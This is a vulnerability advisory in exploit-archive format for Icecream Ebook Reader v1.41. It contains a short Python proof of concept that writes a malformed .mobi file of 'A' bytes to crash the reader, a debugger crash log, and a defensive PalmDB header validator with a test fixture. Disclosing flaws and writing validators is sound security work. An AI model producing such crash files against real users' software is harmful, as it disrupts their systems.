# Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://icecreamapps.com/]
# Version: [Icecream Ebook Reader v1.41]
# Tested on: [Windows XP SP2]
#Technical Details & Description:
#================================
#A memory corruption vulnerability was detected in Icecream Ebook Reader v1.41. An attacker can crash the software with a malformed .mobi or .prc file.
#Attackers can crash the software locally through user interaction, i.e. by having the user open a crafted .mobi or .prc ebook.
#Piece of Code
#========================================================================
#!/usr/bin/python
# Writes 1000 'A' bytes (no PalmDB/MOBI header at all) to crash.mobi
buffer = b"A" * 1000
filename = "crash" + ".mobi"  # For testing with .prc, change the extension
with open(filename, 'wb') as f:  # binary mode: no newline translation on Windows
    f.write(buffer)
print("File Successfully Created [1]")
#========================================================================
#Debugging and Error Log
#========================
#Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
#Copyright (c) Microsoft Corporation. All rights reserved.
#*** wait with pending attach
#Symbol search path is: *** Invalid ***
#****************************************************************************
#* Symbol loading may be unreliable without a symbol search path. *
#* Use .symfix to have the debugger choose a symbol path. *
#* After setting your symbol path, use .reload to refresh symbol locations. *
#****************************************************************************
#Executable search path is:
#ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
#ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
#ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
#ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
#ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
#.... Snipped
#ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
#ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
#ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
#ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
#ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
#ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
#ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
#(f9c.e34): Break instruction exception - code 80000003 (first chance)
#eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#7c901230 cc int 3
#0:003> g
#ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
#ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
#ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
#ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
#... Snipped
#ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
#ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
#ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
#ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
#QIODevice::read: Called with maxSize < 0
#QIODevice::read: Called with maxSize < 0
#(f9c.998): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
#eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll -
#Qt5Core!QTextCodec::toUnicode+0x7:
#671da2a7 8b11 mov edx,dword ptr [ecx] ds:0023:00000000=????????
#Exploitation Technique:
#============================
#Local, DoS, Memory Corruption
#Solution - Fix & Patch:
#=======================
#Restrict the maximum working size and add dedicated exception handling for over-sized requests.
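#As an added defensive example (not code from the advisory or from the vendor), the header check a reader could run before any record is read: it parses the PalmDB container that .mobi and .prc files share, validates record count, offsets and sizes against the file length and a size cap, and refuses the advisory's 1000-byte 'A' file at the type/creator check, so no negative or oversized length ever reaches a decoder such as the QTextCodec::toUnicode call in the log above. The 64 KiB cap, the function names and the build_palmdb fixture are assumptions made for this example.

```python
import struct

PDB_HEADER_LEN = 78           # fixed PalmDB header, big-endian fields
RECORD_ENTRY_LEN = 8          # record-list entry: u32 offset, u8 attrs, 3-byte id
MAX_RECORD_LEN = 64 * 1024    # assumed policy cap for one record ("restrict maximum size")
KNOWN_TYPES = {(b"BOOK", b"MOBI"), (b"TEXt", b"REAd")}  # .mobi and plain PalmDOC .prc

def validate_palmdb(data: bytes):
    """Return (ok, reason); reject the file before any record reaches a text decoder."""
    if len(data) < PDB_HEADER_LEN:
        return False, "shorter than PalmDB header"
    db_type, creator = data[60:64], data[64:68]
    if (db_type, creator) not in KNOWN_TYPES:
        return False, "unknown type/creator %r/%r" % (db_type, creator)
    (num_records,) = struct.unpack(">H", data[76:78])
    if num_records == 0:
        return False, "no records"
    list_end = PDB_HEADER_LEN + num_records * RECORD_ENTRY_LEN
    if list_end > len(data):
        return False, "record list runs past end of file"
    offsets = [struct.unpack(">I", data[PDB_HEADER_LEN + 8 * i:][:4])[0]
               for i in range(num_records)]
    bounds = offsets + [len(data)]            # record i spans [offsets[i], offsets[i+1])
    for i in range(num_records):
        start, end = bounds[i], bounds[i + 1]
        # end < start is exactly the "negative length" case; never pass it to a reader
        if start < list_end or end > len(data) or end < start:
            return False, "record %d offset out of range" % i
        if end - start > MAX_RECORD_LEN:
            return False, "record %d exceeds %d bytes" % (i, MAX_RECORD_LEN)
    return True, "ok"

def build_palmdb(records, db_type=b"BOOK", creator=b"MOBI") -> bytes:
    """Constructed minimal PalmDB container around the given records (test fixture only)."""
    n = len(records)
    header = b"sample".ljust(32, b"\0") + struct.pack(">HHIIIIII", 0, 0, 0, 0, 0, 0, 0, 0)
    header += db_type + creator + struct.pack(">IIH", 0, 0, n)
    offset = PDB_HEADER_LEN + n * RECORD_ENTRY_LEN + 2   # 2-byte gap after the list
    entries = b""
    for i, rec in enumerate(records):
        entries += struct.pack(">IB", offset, 0) + i.to_bytes(3, "big")
        offset += len(rec)
    return header + entries + b"\0\0" + b"".join(records)

if __name__ == "__main__":
    poc = b"A" * 1000                                   # same bytes the PoC above writes
    print("PoC file:", validate_palmdb(poc))            # rejected at the type/creator check
    print("well-formed:", validate_palmdb(build_palmdb([b"\0" * 16, b"Hello"])))
```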
#Author:
#=======
#Kapil Soni (Haxinos)